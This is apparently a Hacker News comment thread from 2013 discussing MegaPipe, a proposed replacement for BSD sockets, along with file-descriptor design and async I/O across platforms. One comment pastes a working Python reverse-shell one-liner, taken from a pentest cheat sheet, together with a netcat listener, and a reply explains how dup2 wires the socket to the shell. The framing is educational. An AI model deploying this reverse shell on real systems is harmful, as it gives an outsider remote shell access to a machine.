This is definitely the correct solution to the problem with BSD sockets - nobody...

chubot · on June 19, 2013

With megapipe, would you still be able to write an event loop that operates on their lwsocket and regular file descriptors from pipes? If not that would complicate many applications.

The fact that I/O is unified under file descriptors is a great abstraction and one of the key design points of Unix, although DJB makes a good point that there should have been two file descriptors for sockets: http://cr.yp.to/tcpip/twofd.html

I ran into a pretty neat usage of sockets as files the other day (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-ch...)

However I am not exactly sure how this code works, but try it:

    $ nc -l 127.0.0.1 1234
    
    then:

    #!/usr/bin/python
    import socket,subprocess,os
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("127.0.0.1",1234))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p=subprocess.call(["/bin/sh","-i"]);

If someone can explain why exactly this works I'm interested. I mean I sort of get it but I am not sure how the socket descriptors can get mapped to stderr, stdout, stdin and everything works.

simcop2387 · on June 19, 2013

netcat is listening on your machine. the python script is connecting to your machine and giving you a shell.

dup2 will take one file descriptor and change it into another.

0 is STDIN's file descriptor by default in *nix (I believe this is standard POSIX, but i could be wrong). 1 is STDOUT, 2 is STDERR.

os.dup2 in this case is taking the file descriptor for the socket and placing it into STDIN, STDOUT, and STDERR.

At this point all the code that does anything with these will end up writing to the TCP socket instead.

When subprocess.call is used, it will inherit the parent's STDIN, STDOUT, and STDERR handles, in this case the TCP socket.

So when the shell tries to output anything it'll go to the TCP socket, when it tries to read it'll go to the TCP socket and get the information.

This is the same way that things like nohup work, by putting all the sockets to a file, the process doesn't get killed when the tty goes away, since it doesn't have one. It also grabs some of the signals from the child first also so the shell doesn't kill it directly.

binarycrusader · on June 19, 2013

Actually, that overhead is not entirely wasted. For example, on Solaris (unlike Linux), Asynchronous I/O is supported for network sockets. (In fairness, Windows also supports it.)

As another example, Solaris has the event completion framework which is also available when using sockets:

https://blogs.oracle.com/barts/entry/entry_2_event_ports

So I wonder how much of this is the platform implementation they were testing instead of their new API? It's unclear from their presentation materials whether this is really just covering up for problems in the implementation.

I would have liked to have seen more test data comparing this work on multiple platforms.

marshray · on June 20, 2013

Linux is popular, but not exactly the gold standard of async IO APIs. Comparisons over more platforms would better support the claim that it's cross-platform improvement over Berkely sockets.

cldr · on June 19, 2013

Don't all programs you use over SSH take advantage of the fact that you can pretend that STDIN is a file even when it's a socket?

ketralnis · on June 19, 2013

I don't think so. ssh allocates a ptty and programs write to that, which ssh then proxies back to you. There's a middle-man.

These programs couldn't write directly to the port 22 TCP socket you use to connect, or their content wouldn't be encrypted or have the other various SSH beenfits.

wittrock · on June 19, 2013

The real problem is the entrenched legacy software that uses BSD sockets. I don't want to even imagine the cost of rewriting all of that to use a different networking paradigm. POSIX certainly isn't the best way to do things, especially with the move to the cloud, but much of today's high-performance software today does fine with sockets. There are absolutely some hacks that are used to get around some inadequacies, but BSD sockets work, by and large.

RyanZAG · on June 19, 2013

Agreed there - maybe a possible option would be to flag a specific port as being non-BSD sockets? So when the kernel reads the port, some short circuit logic could trigger and dump out to a different socket implementation? That would allow legacy to run fine, and then let apps trigger a special flag when binding a socket to allow for direct access. The routing part of tcp/ip happens before BSD sockets are hit, so this should do an end-run around the BSD socket overhead.

Then you could have your system running as normal, but allowing your http server special access to network i/o. Any kernel hackers around who can comment?

zhemao · on June 19, 2013

I'm not certain, but it seems from the article that they implemented MegaPipe to run alongside the BSD API. You do have to keep the BSD sockets API alongside the new implementation. Not only because there is a lot of existing code that depends on it, but also because abstracting a socket as a file is actually useful in many cases.

zzzcpan · on June 19, 2013

As far as I can tell by their ping-pong server example it would be possible to implement some kind of virtual API for BSD sockets on top of megapipe and make it relatively easy for everyone.